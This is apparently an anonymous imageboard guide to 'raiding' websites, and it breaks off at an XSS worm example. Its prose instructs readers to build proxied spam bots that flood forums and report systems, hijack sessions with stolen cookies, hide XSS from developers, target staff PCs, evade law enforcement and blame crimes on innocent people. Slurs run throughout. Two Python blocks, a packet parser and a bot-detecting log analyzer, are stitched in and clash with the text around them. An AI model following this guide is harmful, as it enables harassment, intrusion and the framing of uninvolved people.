A Complete Hacking Tutorial
Anonymous guide on how to be a /h4ck/er on steroids.
---> Read this file top-to-bottom
•••Preliminary•••••••••••••••••
••••What•this•guide•is•••••••••
••••What•this•guide•isn't••••••
••••Target•Audience••••••••••••
•••Programming•••••••••••••••••
•••Rules•and•Protips•••••••••••
••••/i/nsurgent•protips••••••••
••••/h4ck/er•protips•••••••••••
•••Professions•••••••••••••••••
•••Basics•••••••••••••••••••••
••••How•Computers•Work•••••••••
•••••Languages•Control•All•••••
••••Networking•Basics••••••••••
•••••IP•Addresses••••••••••••••
•••••TCP/IP••••••••••••••••••••
•••Raiding•9001••••••••••••••••
••••Websites•••••••••••••••••••
•••••HTTP•Botting••••••••••••••
•••••Session•Hijacking•••••••••
•••••XSS•••••••••••••••••••••••
•••••Breaking•Captcha••••••••••
•••••Phishing••••••••••••••••••
•••••DoS•••••••••••••••••••••••
••••••Weak•Spots•••••••••••••••
•••••R00ting•••••••••••••••••••
•••••Stealing•Information••••••
•••Resources•••••••••••••••••••
••••Tools••••••••••••••••••••••
••••Links••••••••••••••••••••••
••••Reference••••••••••••••••••
•••Closure•••••••••••••••••••••
•••••••••••••••••••••••••••••••
TODO:
Create a long list of keywords to learn
add how to cover tracks
Raiding 9001
-cover exploits regarding php/.net/j2ee/old CGI (c/perl)
*j2ee developed applications are pretty secure, but definitely cover this
*note to newfags: the extension doesn't guarantee which platform the site was
developed on. j2ee rarely ends in .jsp because the servlet usually forwards
to its context root "domain-url/Example" instead of "domain-url/example.jsp".
•••Preliminary•••••••••••••••••
Anyone can pick up and write to this file, but don't drop names into it or
it'll just get sage bombed. Any edits you make, submit in a new thread and let
ppl in /h4ck/ go over them to make sure they aren't wrong or just stupid.
••••What•this•guide•is•••••••••
-How to help an /i/nsurgency using technical expertise
-Again, how to help an /i/nsurgency as opposed to personal vendettas
-Again, HOW TO FUCKING RAID teh internet, so it's focused on websites
-if terms like "lurk moar" confuse you, then this guide won't help you, try:
http://www.google.com/search?q=%22how+to...2&ie=utf-8
PROTIP: If any links are broken, learn to waybackmachine/google.
••••What•this•guide•isn't••••••
-hOW tO bE a HaCkEr
-rooting. This is not another how-to-root guide but it will cover that for
newfags. Rooting != win. Rooting will last for 2-8 hours. A well thought out
attack causes days worth of damage in data lost, and weeks of labor lost.
-any words like script kiddies or any other retarded shit you will hear people
on blogs/digg/fag dominion talking about. Funny how the biggest namefags
who love to talk about hacking the most 1) rarely hack or 2) never hack.
It's also funny how the latter of the two write 90% more than the former.
-linux based. linux != hacking. Knowing linux is helpful if you want to hack
into linux boxes. You have probably read other guides and noticed how they keep
reiterating that you must somehow use only linux or be a linux guru in order to
hack. That is just incorrect, however you will need to know how to use linux
and be rather proficient in it, as it would be pretty fail to not know linux,
then hack into a linux box using some script and then not know what the fuck to
do.
••••Target•Audience••••••••••••
-if gb2/gaia, gb2/bed, or yiff in hell offends you, kill yourself. Anyone who
is a weaboo fag or jerks off to furry shit clearly doesn't have the capacity
to hold a non-remedial job let alone utilize technical expertise.
-you need to be able to program, if you can't, then refer to the paragraph below.
-we are a legion of h4ckers, many of us are IT
professionals/comp sci students (in b4 CS III).
You'll probably end up on that path anyway, why
learn to program then not make good money at an ez
job am i rite? YOU THERE. WHAT IS YOUR PROFESSION?
-If you want to know the answer to "I have an IP what can I do with it"
this means that you don't understand computers very well
and need to learn some more before you attempt to give
out any expertise... Read the next paragraph and after
you do some learnin come back. You'll need to keep reading
shit and never stop... try to spend as much time on your
learnins as you have put into your faggot MMOs? Also
skip to the Basic section and read that before you program.
•••Programming•••••••••••••••••
if (notProgrammer || (pLanguages.size == 1 && pLanguages.next() == "php")
|| shitpilenewb) {
If you can't program you will never know shit. You won't understand how any
exploit works, even the ones you prolly /r/ without even fucking knowing why.
l2/program and LEARN IT GOOD + you will never stop coding once you do. When you
see exploits being mentioned, in the back of your mind you will understand
exactly what it is doing and how it works. Understanding and, after that,
knowing, IS THE EPITOME OF HACKING. You will never know shit unless you learn
how computers work.
~^~
Learn a non-interpreted language first. Rather, just learn C or C++, or Java.
These languages are turned directly into machine code, which is then fed to
the CPU, as opposed to a script, which is interpreted by a program. You will
need to learn about the stack, and other common programming topics, so get a
good book. If you really want to be good, learn ASSEMBLY and learn how C/C++
is converted to assembly. Remember this:
High level language -> Intermediate language -> Machine code
an example:
C -> Assembly -> 01001010 <-instruction
i++ -> INC [i] -> 01001010 10001010 <- EXAMPLE, was too lazy to refer to *correct*
opcode so don't be a wise ass if you did refer and found the 0's and 1's were
completely wrong, because they're just an example and I'm lazy.
Java works differently, yet you will prolly learn it in college. VB is not
helpful, it isn't like other high level languages. Do not learn it.
protip: c#, Ruby on Rails, J2EE and php will not help you learn computers/how to
program anything good. They are highly detailed in helping developers create web
applications. If the idea of *creating* a web game or forum interests you then
learn these as they will automate and make a lot of the programming required for
web development easy. Learn these afterwards though, as they are needed to
understand how web applications work.
~^~
WHAT THE BOOKS WON'T TELL YOU YET WHAT IS MORE IMPORTANT:
-It is all about source code. You learn from source code. After you get the
basics down just google '"source code"+language'. Look at any programs that
interest you. basically, Read a little, write a little, REPEAT. This is what we
all do, no matter skill level.
-Every language has a common library for handling Strings, threads, etc. Some
pretty common code. You WILL need to know this just as well as the syntax so
quickly find the API reference for these. Fuck it, here they are lulz:
http://java.sun.com/j2se/1.5.0/docs/api/ - java obviously
http://www.cplusplus.com/reference/ -c++
-LEARN TO FUCKING GOOGLE! This isn't because you annoy others, if anything ppl
enjoy strobing their e-peen to help you. But, listen. As a paid software dev,
I, and every one of us, google shit at work. Why? Because when you are a
programmer you REUSE code, and you want to find other libraries which already
work well and are very extensive. Whenever you get an error, type it into
google and you will get information pertaining to it.
-The only reason I recommend books is because they SHOULD tell you about the
stack and how computers work in general.
After you have read all of that, can you write a program that visits a webpage,
grabs all of the links there, and visits one of the pages in there? Then steal
all the emails in the page (as it looks for links). Then code it so that it
scans for forms and logs whether or not it found one and what the url was. If
you didn't write good functions (modular code) you still need to learn that or
else you won't be a good coder. Once you have this project up and running, and
can easily make changes (ie: easily add new functionality) to it then you can
move on.
Oh, and one more challenge: learn what the stack is, and then read this and
attempt to understand what a buffer overflow exploit is. These are very common:
http://www.cs.wright.edu/~tkprasad/cours...phOne.html
hint on what stack you want to read about:
http://en.wikipedia.org/wiki/Stack_(data_structure)#Hardware_stacks
^so as not to confuse you with the abstract data structure.
Of course, if you choose java you still need to learn pointers.
So, finish both challenges before you can move on. DO IT FAGGOT!
tl;dr: learn java or c, then assembly and then stick to those for a while
} else {
so you can program? doesn't mean jack. You need to be able to think creatively.
You need to know the "time of day", (hint: its always RAPE). Knowing what to
program is what you need to focus on no matter your skill level.
Other languages and stuff to learn:
Because we hit websites so much, you need to learn HTML and some
javascript, and css. Any other programming languages will be very similar
and learning them should only take 2-4 days. You should also understand TCP/IP
basics, proxies, socks, and HTTP is very important. Also learn binary (it's a
number system, just like decimal... also learn hex, again a number system, not
something that you edit with a hex editor).
}
•••Rules•and•Protips•••••••••••
••••Rules••••••••••••••••••••••
1) Do not namefag. Do not trust namefags. You need 7 proxies, but you'll need
9001 handles. Use a new handle AND proxy often. An internet handle is
as good as your FULL NAME and DOB once they do find your identity. Going
around putting your handle in sploits or coding a bot then posting the link
in the channel with the SAME name over and over means you're a fucking
retard. WE ARE FUCKING CALLED ANONYMOUS FOR A REASON.
2) MODS = FAGS. This applies to ircops and channel ops. Do not "work your way
up" the hierarchy (hence don't namefag). I don't have anything against
these people other than their general name faggotry. We found out the owner
of partyvan IS A G-A-I-A FAG during a raid. Don't trust mods and nevar trust
a namefag.
3) Contribute solutions with the goal of "Getting the job done". Raids need
coders. Some of it is common shit like a bot that spams shit on forums or w/e
messaging. The idea is to take the best strategic course of action. Find or
start a project which will either result in absolute lulz or rape (hence
"whatever works, whatever gets it done"). The idea is to maximize rape, not
grow an e-peen. If you aren't a namefag then growing an e-peen won't
factor in, and you'll understand how important contributing is.
••••/i/nsurgent•protips••••••••
*) Switch your name often, you are anonymous. If you want attention or have some
other psychological needs you can join g00ns. Nothing against them but they
will offer you what you want so that you don't douse decent lulz worthy raids
with your general faggotry.
*) Proxy now instead of later. Even though no shit will happen to you by just
entering a channel, if you later decide to do something illegal and keep the
same fucking name you logged in with, which links to your ip, which your ISP
will be able to link to your SUBSCRIBER ACCOUNT/BILLING ADDRESS, then yeah,
you're a faggot and deserve jail raep.
*) Contribute and post screen shots on teh chans + talk some. If anyone kicks
you, show them your screen shots of lulz.
*) You do not need to be an ircfag. Ideally you wouldn't be lurking there at
all and all of your work should be posted to boards, but the irc is
efficient. It would be very hard to talk, collaborate and have good intel on a
chan.
*) Do not worry about "working your way up the irc channels/mods." In fact, you
shouldn't be doing that at all. If you are looking for social
interaction/importance then gb2/gaia. Also, if you are from gaia or are just
a fag in general and are looking into this because you think it's "trendy",
you will be doxed in a matter of time, could be as soon as a week, or later in
a month, 3 months, eventually, if you don't gb2/gaia and stay there.
••••/h4ck/er•protips•••••••••••
If you think rooting = the ultimate hack then you're a shitpile n00b. If
you want to make an impact, and lulz over what a group, community (fags) and
company had to put up with from what you did with your keyboard then this
guide is for you. Also, this isn't a pissing contest. Nobody gives a shit about
how good you may or may not be. Also if you are anonymous, this wouldn't apply
because in effect, you don't exist, but your work does.
*) Blame it on a namefag. Anything you write, claim credit for it, using
someone else's name. Party van tracks us the same way we dox faggots:
tracing aliases is step #1. Afraid that your exploit will cause enough
monetary damage to warrant an FBI investigation? Hop onto the partyvan irc,
find a random namefag there and blame it on him for teh lulz.
*) Do collaborate with other h4ckers and learn from them. Share source code at
your own discretion. Also you can offer help if you know a lot about a
particular field (ie: if it's your irl job or something you happen to know
the ins-and-outs of).
*) Learn how to hide your tracks and how the internet fucking works before you
start talking, let alone doing anything illegal. Learn how proxies do
give you security, yet can be compromised. Learn how Tor works.
*) Don't read from white hat websites. These are shitpile havens for idiots.
The problem with most people is that they want to appear smart, but only for
the sake of impressing others. Most of their shit is later proven wrong (as
it eventually has to be since they go around informing too many shitpile
noobs who believe everything at face value and can't fucking learn how to
filter noise from content). Most of the websites are making money off of
adsense, if that helps you at all. DO ORIGINAL FUCKING RESEARCH AND TEST YOUR
OWN WORK AND IF YOU CAN'T LEARN HOW TO FILTER OUT SHIT FROM GOOD THEN YOU WILL
NOT GET ANYWHERE.
•••Professions•••••••••••••••••
People are only good at what interests them so pick one or several you like.
Someone else can flesh out moar professions here. Again, profession != skill.
Skill is up to you and your creativity. A simple programmer can beat out a
software engineer if he is more creative.
Programmer
\
\
Software Engineer
|
|
Vxer
Programmer
-Understands a programming language, hopefully C or Java
-Can help with writing some tools, but fails to understand how to
code some things or needs help.
-Can read source code of tools and understand them
-Should be reading a lot of source code to become better
Software Engineer
-Able to create tools for raids. Very helpful, somewhat common
-Able to find simpler exploits, such as XSS
-Able to exploit the already discovered
VXer
-Highest level of Coder, a virus writer/GOD
-Knows Assembly very well. Works from the lowest level, most difficult.
-Able to reverse engineer software and discover trade secrets and exploits
-Can discover software exploits well/buffer overflows/good ones
-rare to non-existent. Needed, but most difficult.
This is just to give you an idea of whats out there. This is in no way some
kind of theory or application.
•••Basics••••••••••••••••••••••
At this point everyone knows how to program. Don't be concerned if you are new
and you still have more questions. This part of the guide will be the last to
teach and cover basics. Oftentimes the problem in /h4ck/ is that there are
questions from noobs who just don't know how computers or networks work in
general. Knowing how to program is the only way to understand how computers AND
networks actually work. There are some basics that need to be covered.
••••How•Computers•Work•••••••••
If you are really new, just google it and read a simpler guide b4 reading this.
Everything occurs at the CPU, essentially. And it is sequential; one at a time.
NOTHING on your computer runs simultaneously, even on dual processors because
one of those CPUs has to wait for the other to finish :P. It's simply breaking
up what one CPU would have done anyway, ONLY IF the programmer designed it for
dual core (threading according to that architecture). Oftentimes you can hit
ctrl + alt + del and see a process like a game consuming 50% of your CPU
because that game, like almost every other program to date, isn't designed for
dual core. ANYWAY, back on subject:
Everything in the computer occurs in steps of finite time, ONE by ONE. This
time is known as the system clock, which runs at a certain MHz. Let's say it's
133 MHz. However the CPU runs faster, yet on the same clock. How? It runs,
as set in the BIOS (check yourself), at a multiplication factor of the system
clock. So say it runs at 9x (system clock), or 9 x 133 MHz = 1197 MHz, or about
1.2 GHz. So the CPU can do 9 operations before the System bus (which runs at the
speed of the system clock) will be accessed (if needed) to get something from
RAM, an HDD, or a device. As a computer user, the only thing you ever do on a
computer is play around with the CPU, using an application to do this for you.
THE CPU then reads/writes to everything else in the computer... the CPU controls
the rest of the computer. As a programmer you control the CPU much more closely.
Obviously you can't do shit on a computer if you don't understand it, and you
can see where programming comes in as a need to know. Also, multiple programs
ONLY seem to run on a computer simultaneously, but they are, in reality, being
given a small fraction of time to run, in a priority queue, then kicked off the
CPU by the OS's CPU scheduler and given to the next process in line. For the
noob, process = program. Program = simple user level talk.
The goal of any hack is to get access to the CPU essentially. Obviously root or
an admin account would be prime access to run the best applications BUT if you
can inject your own code in there during a user session (often called shell code)
to give you such an account or a higher level system privilege then you are in.
•••••Languages•Control•All•••••
A non-interpreted language is compiled directly into executable objects. These
are files, often in a particular OS format (Like PE Format for windows). Within
this format will be the .text section which contains all of the CPU
instructions. This object file, like a .exe on windows, is loaded and given its
own id and the CPU scheduler determines when it will be loaded in. System
processes are given higher priority, but they pretty much take turns. Windows
uses 32 priority queues. The top 16 belong to system processes. The scheduler
starts with the highest number queue and works its way down until it finds a
process that needs to run (its status will be set to waiting, as in it's waiting
to be run on the CPU.) Otherwise its status will be blocked and it won't run
on the CPU because it doesn't need to. Also it could be waiting for I/O, which
is relatively VERY slow compared to the CPU. This is where multi-threading
comes in. One thread will do I/O so that the entire process isn't blocked. This
is how a good DoS tool works too, so that it doesn't do 1 crappy request at a
time, but uses many threads, one for each I/O.
The only way you will do anything on a computer is through a process. If you
can't write processes, or engineer your own code into one (buffer overflow),
then how can you ever claim to be a hacker? There is no flashy program that
"hacks", or even a command line tool. And linux has nothing to do with hacking
other than the fact you need to know what the fuck to do on a linux box provided
you get into one. Would be pretty fail if you get in but have no clue as to
what to do. And an OS is all code just the very same way a process is, save
for the fact that it is the process which is originally loaded, and takes
complete control over all of the computer and only allows other processes to
run on time-shares.
As a hacker you will always need to do something tailored to your needs, there
is no already precompiled solution for everything. And why wouldn't you prefer
your own control over the computer instead of an application? Users are forced
to use applications in order to get the computer to do what they need. A hacker
forces the computer to do what he/she wants it to do based on his/her wants.
Of course you are never to re-invent the wheel if something already written is
sufficient for what you are doing, however oftentimes the task at hand
holds intricate requirements. For example if you're installing a virus on a
machine that you want to initiate a DoS at a certain time (maybe
whitehouse.gov? :S), you should definitely use a module somewhere already written
for that, provided it doesn't trip any AV. No point to re-write something so
simple and obviously something incredibly modular like that.
••••Networking•Basics••••••••••
Protip: A server is a process running on a *PORT*. The service running on that
port is a server. Colloquially a server is a machine, technically it is a
service that a client connects to.
Basically, it is just: computers running routing software (aka: A ROUTER!) +
DNS lol.
The internet is a network of networks, interconnected at certain high volume
areas. If you and your neighbor are on the same ISP then when you connect to
his pc for a game or w/e then you only hop to routers located within that
network. Consequently your traffic will never leave that town. However if the
same neighbor was using a different ISP your traffic would prolly be routed to
DC, New York, LA, Atlanta, etc., some major city where traffic can cross
between the two ISPs.
•••••IP•Addresses••••••••••••••
Again, the internet is a network of networks. These networks are inter-connected
(hence internet!) via routers. Networks like universities and ISPs, which then
are routed to much larger networks like level3 for example. The way an IP
address works is, yes, it is like the "virtual address" of your computer. But
here's what's worth noting... An IP address is routed (obviously by routers) to
its destination based on the IP number itself, and of course the router's
following of TCP/IP (using routing tables).
Certain organizations are granted blocks of IP addresses, for example Harvard
was granted the entire 128.xxx.xxx.xxx (class A) block awhile ago. This
obviously isn't done anymore. Routers will forward packets based on the
destination IP address until it gets closer and closer, examining as much of
the A.B.C.D as needed. Technically you can set up your own home network and give
your machines whatever IP you want, packets will be forwarded based on your
router's tables. Obviously this network and its current configuration will never
be asked about by any other admin from another network if they want to connect
the two.
A LAN, still running on the same TCP/IP protocol that the internet uses, will
use internal IP addresses to route its traffic. These IP addresses are in the
format of 192.168.x.x. These do not and are not routable on the internet, they
are reserved to route within local area networks. So yes, behind a network when
you want to connect to something like 192.168.1.2 you might connect to a printer
set up on your home network (if your printer is configured to be accessible over
the network, and obviously it will be physically connected to a router...). Most
people are given a router/modem combo from their ISP, thus this paragraph
explains why your IP address appears to be 192.168.x.x instead of what
whatismyip.com will tell you (which is the external IP address of your router).
Its internal IP address will be in the format of 192.168.x.x. Learn more about
ARP to get the full picture.
•••••TCP/IP••••••••••••••••••••
TCP/IP is a suite of protocols. Keep that in mind. It encompasses ones you have
most likely heard of: TCP, UDP and IP. Also, IP Address = part of the IP
protocol; they follow it and pertain to the rules. Routers do the same so that
they can read IP Addresses and forward them correctly.
Read a book on TCP/IP. You can sorta skip the ISO network stack and focus on
TCP/IP part. Basically, the tl;dr version:
[Physical layer][Link Layer][Network Layer][Transport Layer][Application Layer]
This describes how data is sent in packets. Each packet has the following
layers. Each layer is built in order for each part of the network to forward it
to its destination. These layers break up the packet, since it is just data,
hence why its called a datagram. Each layer is added by the appropriate
software.
Now to explain the layers in the order that they are *READ*:
Physical Layer - This layer is read by equipment that telecom companies operate.
Like switches, trunks and other boxes in CO stations. We don't really delve into
this here :S
Link Layer - Typically this is used for how data is transmitted over an ethernet
cable. Routers can read this and use the MAC address (every device connected to
a network has a MAC address, not just NIC cards). This layer contains the MAC
address.
Network Layer - This is THE IP layer. It contains the destination IP address and
source IP address (your IP address). This is what routers will read in order to
forward your packet over the internet. They will read and replace each Link
Layer in order to forward it to the next router, but while any packet is on
the internet, this layer is not replaced, though it is definitely read at each
router. Again, IP Address = THE TCP/IP protocol. Rather, one of the
Transport Layer - Typically either TCP or UDP. This layer contains information
relevant to the connection. This layer contains the port number, and only
needs to be read by the destination machine's TCP/IP software. However "deep
packet inspection" can read this, as do NAT routers which have to read it.
Anyway, TCP is the connection based protocol, UDP is completely connectionless
alone, unless the application simulates a connection using its own rules. Just
read over these two in a book, you'll get the complete understanding + PICTURES.
Application Layer - The application layer is JUST data for the program that uses
the said connection. This data is the content of the connection. The application
writes whatever it wants to this stream and reads all content from it just as
though the two weren't connected to the internet. This is how the Layer approach
strictly divides and SEPARATES data so that things run smoothly and simply.
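As an added example that is not part of this file, here is a Python walk through one constructed frame, reading the link, network, transport and application layers in the order just described; it also verifies the IPv4 header checksum (not mentioned above, but every router checks it) and flags the 192.168.x.x source address from the IP Addresses section, plus the other RFC 1918 blocks, as non-routable. The frame bytes, MACs and addresses are made up.

```python
import ipaddress
import struct

# Added example, not from the guide: decode one constructed Ethernet frame
# layer by layer (link -> network -> transport -> application).

# RFC 1918 private blocks; the guide only names 192.168.x.x, the other two are
# the same kind of address and are never forwarded on the internet either.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
TCP_FLAGS = (("FIN", 0x01), ("SYN", 0x02), ("RST", 0x04), ("PSH", 0x08), ("ACK", 0x10), ("URG", 0x20))


def ip_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum over the IPv4 header; a valid header sums to 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def is_private_v4(addr: str) -> bool:
    """True for 192.168.x.x and the other RFC 1918 ranges (LAN-only addresses)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in PRIVATE_NETS)


def parse_frame(frame: bytes) -> dict:
    """Decode link -> network -> transport -> application and return the interesting fields."""
    # Link layer: destination MAC, source MAC, EtherType (0x0800 = IPv4 follows)
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0800:
        raise ValueError("not an IPv4 frame: EtherType 0x%04x" % ethertype)
    # Network layer: the IP header that every router on the path reads
    ip = frame[14:]
    ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _csum, src, dst = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20:
        raise ValueError("malformed IPv4 header")
    if ip_checksum(ip[:ihl]) != 0:
        raise ValueError("bad IPv4 header checksum")
    if proto != 6:
        raise ValueError("not TCP: protocol %d" % proto)
    # Transport layer: ports, sequence numbers and flags, read at the endpoints (and by NAT/DPI boxes)
    tcp = ip[ihl:total_len]
    src_port, dst_port, seq, ack, off_flags, window, _tcsum, _urg = struct.unpack("!HHIIHHHH", tcp[:20])
    data_off = (off_flags >> 12) * 4
    flags = [name for name, bit in TCP_FLAGS if off_flags & bit]
    # Application layer: whatever the program wrote to the stream, here an HTTP request
    payload = tcp[data_off:]
    src_ip, dst_ip = str(ipaddress.ip_address(src)), str(ipaddress.ip_address(dst))
    return {
        "src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
        "src_ip": src_ip, "dst_ip": dst_ip,
        "src_private": is_private_v4(src_ip), "dst_private": is_private_v4(dst_ip),
        "ttl": ttl, "src_port": src_port, "dst_port": dst_port, "seq": seq, "ack": ack,
        "flags": flags, "window": window, "payload": payload,
    }


def build_sample_frame() -> bytes:
    """Constructed sample: a LAN host (192.168.1.2) sending an HTTP GET to a public
    server (203.0.113.10 is a documentation address, not a real host)."""
    payload = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
    # TCP: src port 49152, dst port 80, seq 1000, ack 1, data offset 5 words, PSH+ACK
    tcp = struct.pack("!HHIIHHHH", 49152, 80, 1000, 1, (5 << 12) | 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    src, dst = bytes([192, 168, 1, 2]), bytes([203, 0, 113, 10])
    fields = [0x45, 0, total_len, 0x1234, 0x4000, 64, 6, 0, src, dst]
    fields[7] = ip_checksum(struct.pack("!BBHHHBBH4s4s", *fields))  # fill in the checksum
    ip = struct.pack("!BBHHHBBH4s4s", *fields)
    eth = struct.pack("!6s6sH", bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), 0x0800)
    return eth + ip + tcp + payload


if __name__ == "__main__":
    for key, value in parse_frame(build_sample_frame()).items():
        print(key, value)
```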
•••Raiding•9001••••••••••••••••
Internet Hate Machine + technical expertise = ???
Most likely a website raid. This is not a PA how to hack your ex-gf/stalked
victim's PC. You prolly don't even have the capacity to do such anyway :S
But that doesn't mean PC hacking is off limits. If you can hack a website's
webmasters', developers' or mods' PC, that can produce MUCH lulz. The sky's the
limit, after all... so nothing is off limits, ever. As an /i/nsurgency we focus
on websites, so keep that in mind.
••••Websites•••••••••••••••••••
The target is not a web server. The target is the target and anything related
to said target. This includes the web server, the staff, the community. Also,
rooting != the end-all win, not by a long shot. It will last for a couple of
hours and be patched up, but nonetheless it's pretty win psychologically. The
goal is to cause as much damage as possible, rooting can be done, but it is
guaranteed that there are other actions that will cause much more damage,
and lulz, than an attack lasting only for a couple of hours.
You will really need to know some basic TCP/IP, completely know HTTP and know
HTML, and some basic javascript. The js is to help your emulation in case the
js is redirecting or modifying something that will end up in a POST request
AND for XSS obviously.
•••••HTTP•Botting••••••••••••••
Highly effective against online communities. These drive the owners, members
and devs fucking crazy, cost them a lot of money, and are a constant annoyance.
From viewing Moderator forums that a fellow anon hacked into, it was seen that
the devs and mods f-u-c-k-i-n-g hate bots. So, when raiding, BOT every thing
you can. Always bot the content reporting systems to fuck up their ability to
report shit! They will respond by adding a captcha = also win. Then move
onto other things, such as their forum, and whatever else can be spammed.
Be sure to write RE-USABLE code so that when you move from one system to the
next, you can write each spammer (which is an HTTP Bot) quickly and easily. Hint:
Use object oriented programming, and have an HTTP Bot class which can be
extended easily.
The steps to botting are fun and simple. Also, provided there is not a very
complex CAPTCHA, YOU CAN BOT ANYTHING. As long as your browser can do it, you
can bot it. Because botting is just emulating your browser. If you ever run into
a problem its because you are not emulating the web browser closely enough. Also
allow all of your bots to use tor or some other user specified proxy.
0) Learn HTTP. Read up on this protocol, you'll learn a lot of need-to-know shit
1) Emulating the target service. Run IE, clear cookies (because your bot prolly
won't have saved cookies once it closes (it will save them and use them while
running, of course), and your bot will not have any cookies on the first run
anyway). Now run Fiddler2. Examine the request and response headers. Ignore
any SSL (port 445), images, css. But take note of HTML and JS. Don't read the
HTML lol, just copy and paste it into a new .html file on your computer to
quickly view it or use Fiddler2's integrated browser. SAVE this for later use.
2) Now that you have mapped out the details, begin coding. You'll want to
emulate any POST requests, find the post parameters and anything in the query
string. This is how you emulate your requests. Also try to copy certain HTTP
request headers, like referer, user agent, and the one that says "Form encoded"
is important. However, you should be using something like Mechanize (for perl),
or Apache Commons HttpClient (for java). Something which takes care of handling
cookies and emulating a lot of the browser. You won't need to set a lot of those
headers yourself because a library like the ones just mentioned will do that
for you.
3) Run your bot, but set your program to use an HTTP Proxy, running on port
8888. This is fiddler2; you'll want it to connect thru that so it can read your
bot. Then compare this with your saved copy and see where you are not emulating
correctly.
4) Maintenance - If the target website changes something to break your bot, you
will want to use fiddler to see where your bot doesn't correctly mimic IE, by
comparing the two Fiddler sessions (1 from IE, and 1 from your bot). Otherwise
if they added a CAPTCHA you win. Next would be breaking the captcha OR writing a
tool which automates captchas so a fellow /b/tard can solve them to produce lulz.
Ideally if you can write this as a web app so ppl can just visit the web site
instead of d/l something, that would be pretty win. But CAPTCHAs are becoming
broken more and more every day so look into that.
5) This isn't the fifth step but, rather, a note. You will want your bots to be
multithreaded. If they aren't they will only be able to spam one at a time. If
they are multi-threaded, you can load several accounts in at a time.
Finally you will want to create an auto captcha program. This will bot the
target's user registration system and allow you to only enter 1 captcha to
create a program. Eventually the target might start to check that the client
isn't running a proxy on port 80, or port 8080. As well as begin ip b&
automatically after a certain number of registrations. In this event, you will
need to have a LARGE list of GOOD proxies that you can serve up on a web server
so that your spammer programs can call this list and get a fresh proxy server.
You can use a combination of web spiders and wget to build your own proxy list.
Also at the time of this writing, there is a current anon project related to
just this. Hopefully it will be up indefinitely.
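Seen from the defending side, this is an added Python example (not from this guide) of the checks a site operator would run over the access log against exactly the bots described in steps 0-5: requests whose headers don't match the browser they claim to be (no Referer on a POST, a non-Mozilla User-Agent such as the default string HttpClient 3 sends), and the automatic IP ban after too many registrations that the text says targets eventually add. The log lines, IPs and paths are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Added example, not from the guide. Constructed access-log lines in the usual
# "combined" format (Referer and User-Agent quoted at the end); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2009:13:55:36 +0000] "GET /register HTTP/1.1" 200 512 "http://forum.test/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
203.0.113.5 - - [10/Oct/2009:13:55:41 +0000] "POST /register HTTP/1.1" 302 0 "http://forum.test/register" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
198.51.100.9 - - [10/Oct/2009:13:56:01 +0000] "POST /register HTTP/1.1" 302 0 "-" "-"
198.51.100.9 - - [10/Oct/2009:13:56:02 +0000] "POST /register HTTP/1.1" 302 0 "-" "-"
198.51.100.9 - - [10/Oct/2009:13:56:03 +0000] "POST /register HTTP/1.1" 302 0 "-" "-"
198.51.100.9 - - [10/Oct/2009:13:56:04 +0000] "POST /register HTTP/1.1" 302 0 "-" "-"
198.51.100.77 - - [10/Oct/2009:13:57:10 +0000] "POST /report HTTP/1.1" 200 20 "http://forum.test/thread/42" "Jakarta Commons-HttpClient/3.1"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line: str):
    """Split one combined-format log line into its fields, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["time"] = datetime.strptime(req["time"], "%d/%b/%Y:%H:%M:%S %z")
    return req


def header_anomalies(req: dict) -> list:
    """Cheap tells that a request did not come through a browser the way a user's would.
    Heuristics only: privacy add-ons strip Referer too, so treat these as signals, not proof."""
    reasons = []
    if req["method"] == "POST" and req["referer"] == "-":
        reasons.append("POST without Referer")
    if req["ua"] == "-" or not req["ua"].startswith("Mozilla/"):
        reasons.append("non-browser User-Agent")
    return reasons


def analyze(log_text: str, limit: int = 3, window: timedelta = timedelta(seconds=60),
            register_path: str = "/register") -> dict:
    """Return per-IP header findings and the IPs that sent more than `limit`
    registration POSTs inside a sliding `window` (the automatic ban the text mentions)."""
    flagged = defaultdict(set)   # ip -> set of anomaly reasons
    recent = defaultdict(deque)  # ip -> timestamps of recent registration POSTs
    banned = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        flagged[req["ip"]].update(header_anomalies(req))
        if req["method"] == "POST" and req["path"] == register_path:
            q = recent[req["ip"]]
            q.append(req["time"])
            while req["time"] - q[0] > window:  # drop attempts that fell out of the window
                q.popleft()
            if len(q) > limit and req["ip"] not in banned:
                banned.append(req["ip"])
    return {"header_flags": {ip: sorted(r) for ip, r in flagged.items() if r}, "banned": banned}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```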
•••••Session•Hijacking•••••••••
-grab cookies
-simply take all cookies (just a string), and use the Modify Headers firefox
extension to login as victim
•••••XSS•••••••••••••••••••••••
-XSS basics
-make sure to hide xss from devs
*Do not ever submit XSS in the form of alert("whatever"). Any user/dev will
find this and fix it. Use a combination of Greasemonkey/Firebug to set
arbitrary DOM objects to arbitrary values that you can test are set. Refer to
tools at the bottom of this file.
-XSS worms
*An XSS worm is one that uses JS to redeploy itself. EX:
